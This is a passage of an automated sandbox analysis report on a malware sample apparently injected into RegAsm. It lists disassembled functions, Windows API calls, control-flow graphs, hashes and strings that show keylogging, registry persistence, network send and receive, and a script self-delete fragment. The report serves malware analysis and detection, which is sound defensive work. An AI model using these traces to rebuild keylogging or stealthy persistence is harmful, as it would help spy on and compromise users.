                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                                  • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreatePointerWrite
                                                  • String ID: xpF
                                                  • API String ID: 1852769593-354647465
                                                  • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                  • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                  • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                  • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                                  Function 0041B354 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1308 41b354-41b3ab call 41c048 call 4135e1 call 401fe2 call 401fd8 call 406b1c 1319 41b3ad-41b3bc call 4135e1 1308->1319 1320 41b3ee-41b3f7 1308->1320 1325 41b3c1-41b3d8 call 401fab StrToIntA 1319->1325 1321 41b400 1320->1321 1322 41b3f9-41b3fe 1320->1322 1324 41b405-41b410 call 40537d 1321->1324 1322->1324 1330 41b3e6-41b3e9 call 401fd8 1325->1330 1331 41b3da-41b3e3 call 41cffa 1325->1331 1330->1320 1331->1330
                                                  APIs
                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                    • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                    • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                    • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                  • StrToIntA.SHLWAPI(00000000,0046CA08,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0041B3CD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCurrentOpenProcessQueryValue
                                                  • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                  • API String ID: 1866151309-2070987746
                                                  • Opcode ID: 619bc13ef983509798e4cc56ab9e00072be03ad0848662060b437d2fd6fbf6a7
                                                  • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                                  • Opcode Fuzzy Hash: 619bc13ef983509798e4cc56ab9e00072be03ad0848662060b437d2fd6fbf6a7
                                                  • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
                                                  Function 0040A6B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1382 40a6b0-40a6c0 1383 40a6c6-40a6c8 1382->1383 1384 40a75d-40a760 1382->1384 1385 40a6cb-40a6f1 call 401f04 CreateFileW 1383->1385 1388 40a731 1385->1388 1389 40a6f3-40a701 GetFileSize 1385->1389 1390 40a734-40a738 1388->1390 1391 40a703 1389->1391 1392 40a728-40a72f CloseHandle 1389->1392 1390->1385 1393 40a73a-40a73d 1390->1393 1394 40a705-40a70b 1391->1394 1395 40a70d-40a714 1391->1395 1392->1390 1393->1384 1396 40a73f-40a746 1393->1396 1394->1392 1394->1395 1397 40a716-40a718 call 40b117 1395->1397 1398 40a71d-40a722 Sleep 1395->1398 1396->1384 1399 40a748-40a758 call 409097 call 40a1b4 1396->1399 1397->1398 1398->1392 1399->1384
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                  • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleSizeSleep
                                                  • String ID: XQG
                                                  • API String ID: 1958988193-3606453820
                                                  • Opcode ID: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                  • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                                  • Opcode Fuzzy Hash: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                  • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                                                  Function 0040A1B4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040A249
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040A255
                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread$LocalTimewsprintf
                                                  • String ID: Offline Keylogger Started
                                                  • API String ID: 465354869-4114347211
                                                  • Opcode ID: 098326c162aceabd9f0c0eb4b3a82a63fe043fb3064ffd9179b7d27db5e713f4
                                                  • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                  • Opcode Fuzzy Hash: 098326c162aceabd9f0c0eb4b3a82a63fe043fb3064ffd9179b7d27db5e713f4
                                                  • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                  Function 004137AA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                  • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000,004752F0,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137E1
                                                  • RegCloseKey.KERNEL32(?,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137EC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID: pth_unenc
                                                  • API String ID: 1818849710-4028850238
                                                  • Opcode ID: 4470799dcfde6683a975b44515cd928480e6138ab46ed270d1b1aebcf1de6a3b
                                                  • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                  • Opcode Fuzzy Hash: 4470799dcfde6683a975b44515cd928480e6138ab46ed270d1b1aebcf1de6a3b
                                                  • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                  Function 0040D0A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                  • GetLastError.KERNEL32 ref: 0040D0BE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateErrorLastMutex
                                                  • String ID: SG
                                                  • API String ID: 1925916568-3189917014
                                                  • Opcode ID: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                  • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                                  • Opcode Fuzzy Hash: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                  • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                                                  Function 004135E1 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                  • RegCloseKey.KERNEL32(?), ref: 0041362D
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                  • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                                                  • Opcode Fuzzy Hash: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                  • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                                                  Function 00413584 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 004135C2
                                                  • RegCloseKey.KERNEL32(?), ref: 004135CD
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                  • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                                                  • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                  • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                                                  Function 0041353A Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C1D7,00466C58), ref: 00413551
                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040C1D7,00466C58), ref: 00413565
                                                  • RegCloseKey.KERNEL32(?,?,?,0040C1D7,00466C58), ref: 00413570
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                  • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                                                  • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                  • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                                                  Function 004138B2 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                  • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                  • RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID:
                                                  • API String ID: 1818849710-0
                                                  • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                  • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                                  • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                  • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                                  Function 00409E1F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _wcslen
                                                  • String ID: pQG
                                                  • API String ID: 176396367-3769108836
                                                  • Opcode ID: 2909f1be4624e20aefd95f70af1697863fb55ab0ff45cf84c0a49d4b96723009
                                                  • Instruction ID: e26466b944e621eef81fbe5db30e3e3b172770e45cde188e8c087a2518f8d89f
                                                  • Opcode Fuzzy Hash: 2909f1be4624e20aefd95f70af1697863fb55ab0ff45cf84c0a49d4b96723009
                                                  • Instruction Fuzzy Hash: 631181319002059BCB15EF66E852AEF7BB4AF54314B10413FF446A62E2EF78AD15CB98
                                                  Function 00446206 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 00446227
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  • HeapReAlloc.KERNEL32(00000000,00000000,?,?,0000000F,00000000,00432F93,00000000,0000000F,0042F99D,?,?,00431A44,?,?,00000000), ref: 00446263
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocAllocate_free
                                                  • String ID:
                                                  • API String ID: 2447670028-0
                                                  • Opcode ID: b157f1fc507fc560bd00b565224a750c722b28025775eaa04a87fd2772ac9c2e
                                                  • Instruction ID: 528349031ecf72c594af6ac828cc426c74ce8c7b4bfa82022820746e0f177899
                                                  • Opcode Fuzzy Hash: b157f1fc507fc560bd00b565224a750c722b28025775eaa04a87fd2772ac9c2e
                                                  • Instruction Fuzzy Hash: 4CF0283110121176BB213B266C01B6B3759AF83B70B1700ABFC1466281CFBCCC41406F
                                                  Function 0040482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • socket.WS2_32(?,00000001,00000006), ref: 00404852
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                    • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateEventStartupsocket
                                                  • String ID:
                                                  • API String ID: 1953588214-0
                                                  • Opcode ID: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                  • Instruction ID: ed99eca956a2b7a9b5891d615cc725ddac26720bb1770143763ad27df005c20f
                                                  • Opcode Fuzzy Hash: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                  • Instruction Fuzzy Hash: 760171B1408B809ED7359F38A8456877FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                  Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                  • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                  • Opcode Fuzzy Hash: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                  • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                                  Function 00414F24 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,004151C3,00000000,00000001), ref: 00414F46
                                                  • WSASetLastError.WS2_32(00000000), ref: 00414F4B
                                                    • Part of subcall function 00414DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                    • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                    • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                    • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                    • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                    • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                    • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                    • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                  • String ID:
                                                  • API String ID: 1170566393-0
                                                  • Opcode ID: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                                  • Instruction ID: 64a5677b7ab27dcaa32d5743096e05a6e92bfc5102e3e8065abb212a99eff034
                                                  • Opcode Fuzzy Hash: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                                  • Instruction Fuzzy Hash: 23D017322005316BD320A769AC00AEBAA9EDFD6760B12003BBD08D2251DA949C8286E8
                                                  Function 00450154 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00445B74: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000), ref: 00445BB5
                                                  • _free.LIBCMT ref: 004501C0
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap_free
                                                  • String ID:
                                                  • API String ID: 614378929-0
                                                  • Opcode ID: 60f99f4f74d771fb4a1326b0b926bb5a841854500e0a6ddc8464f8a9dc27050b
                                                  • Instruction ID: 1bf88885f7a62dfe3e195aa205353632c6f85cb380d5d404dcdd82bf2c99678c
                                                  • Opcode Fuzzy Hash: 60f99f4f74d771fb4a1326b0b926bb5a841854500e0a6ddc8464f8a9dc27050b
                                                  • Instruction Fuzzy Hash: DB014976200744ABE731CF6ACC42D5AFBD8EB85370F25062EE58483281EB34A909C779
                                                  Function 00445B74 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000), ref: 00445BB5
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
                                                  • Instruction ID: ef76d3429b2572ee2e16b707a9c356192af24cfd4e901c13b73aaad13af6506a
                                                  • Opcode Fuzzy Hash: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
                                                  • Instruction Fuzzy Hash: BEF0B431500F65ABBF222E22AC05E5B3769DB81770B14412BB914EA286CA38FC0186AC
                                                  Function 004461B8 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                  • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                  • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                  • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                                  Function 0040489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Startup
                                                  • String ID:
                                                  • API String ID: 724789610-0
                                                  • Opcode ID: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                  • Instruction ID: 97c3e6bab4f4407137ad71e204409d8be70fba83985c90e8682379c152a4c00d
                                                  • Opcode Fuzzy Hash: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                  • Instruction Fuzzy Hash: 92D0123255C70C8EE620ABB4AD0F8A4775CC317616F0007BA6CB5836D3E6405B1DC2AB
                                                  Function 00426D42 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: recv
                                                  • String ID:
                                                  • API String ID: 1507349165-0
                                                  • Opcode ID: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                  • Instruction ID: c63eaffdb417a6470c671315a396a42075a312041b5b8b5670d44767818a4bbd
                                                  • Opcode Fuzzy Hash: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                  • Instruction Fuzzy Hash: 26B09279108202FFCA150B60CC0886ABEA6ABC8382B00882DB586411B0C736C851AB26
                                                  Function 00426D59 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: send
                                                  • String ID:
                                                  • API String ID: 2809346765-0
                                                  • Opcode ID: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                  • Instruction ID: 21703143275c54c82102de5c78eddca0fb0a16d203a0de67c7bd570fb3111ac2
                                                  • Opcode Fuzzy Hash: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                  • Instruction Fuzzy Hash: 87B09B75108301FFD6150760CC0486A7D6597C8341F00491C718741170C635C8515725

                                                  Non-executed Functions

                                                  Function 00407CD2 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                  • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                  • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
